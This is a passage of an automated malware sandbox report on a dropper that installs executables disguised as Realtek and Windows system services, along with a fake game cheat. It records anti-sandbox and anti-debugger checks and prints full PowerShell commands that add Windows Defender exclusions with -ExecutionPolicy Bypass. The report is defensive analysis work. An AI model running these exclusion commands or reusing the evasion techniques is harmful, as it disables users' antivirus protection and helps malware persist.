                          Source: Realtek HD Audio Universal Service.exe, 00000002.00000000.2043414047.00000000000B2000.00000002.00000001.01000000.00000005.sdmp, Realtek HD Audio Universal Service.exe.0.drBinary or memory string: SBIEDLL.DLL
                          Source: Windows Shell Experience Host.exe, 00000003.00000000.2044758866.0000000000CA2000.00000002.00000001.01000000.00000006.sdmp, Windows Shell Experience Host.exe.0.drBinary or memory string: SBIEDLL.DLLINFO
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeMemory allocated: 520000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeMemory allocated: 1A440000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeMemory allocated: 13E0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeMemory allocated: 1AF30000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeMemory allocated: 1DB15340000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeMemory allocated: 1DB2ECA0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8558
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1007
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8370
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1085
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5107
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2053
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6973
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 616
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5189
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 482
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5788
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6753
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2292
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7920Thread sleep count: 8558 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7896Thread sleep count: 1007 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152Thread sleep time: -12912720851596678s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8160Thread sleep time: -11068046444225724s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8604Thread sleep count: 5107 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8608Thread sleep count: 2053 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8648Thread sleep time: -4611686018427385s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8620Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9008Thread sleep count: 6973 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9048Thread sleep time: -3689348814741908s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9004Thread sleep count: 616 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9024Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6436Thread sleep count: 5189 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8332Thread sleep time: -2767011611056431s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6436Thread sleep count: 482 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3836Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8352Thread sleep count: 5788 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8580Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6564Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8824Thread sleep count: 6753 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8840Thread sleep count: 2292 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8924Thread sleep time: -5534023222112862s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7960Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeCode function: 0_2_00402654 FindFirstFileA,0_2_00402654
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeCode function: 0_2_004054C6 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004054C6
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeCode function: 0_2_00405E9C FindFirstFileA,FindClose,0_2_00405E9C
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: Realtek HD Audio Universal Service.exe.0.drBinary or memory string: vmware
                          Source: Realtek HD Audio Universal Service.exe, 00000002.00000000.2043414047.00000000000B2000.00000002.00000001.01000000.00000005.sdmp, Realtek HD Audio Universal Service.exe.0.drBinary or memory string: fwX4tCmszGsW10UDYjL2k6ULz2XWW81xpUUKb8FPzB3uqEmUAIWR7YiaNpqjhvtLuFeAPO
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeAPI call chain: ExitProcess graph end nodegraph_0-3062
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeMemory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe'
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe'
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Windows Shell Experience Host.exe'
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Realtek HD Audio Universal Service.exe'
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe'Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Realtek HD Audio Universal Service.exe'Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe'Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Windows Shell Experience Host.exe'Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe'
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeProcess created: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe "C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeProcess created: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe "C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeProcess created: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exe "C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe'Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Realtek HD Audio Universal Service.exe'Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Realtek HD Audio Universal Service.exe'Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe'Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Shell Experience Host.exe'Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Windows Shell Experience Host.exe'Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Shell Experience Host.exe'Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://discord.gg/BNXa5rYFXMJump to behavior

                          Language, Device and Operating System Detection

                          barindex
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe, type: DROPPED
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\netstandard\v4.0_2.0.0.0__cc7b13ffcd2ddd51\netstandard.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
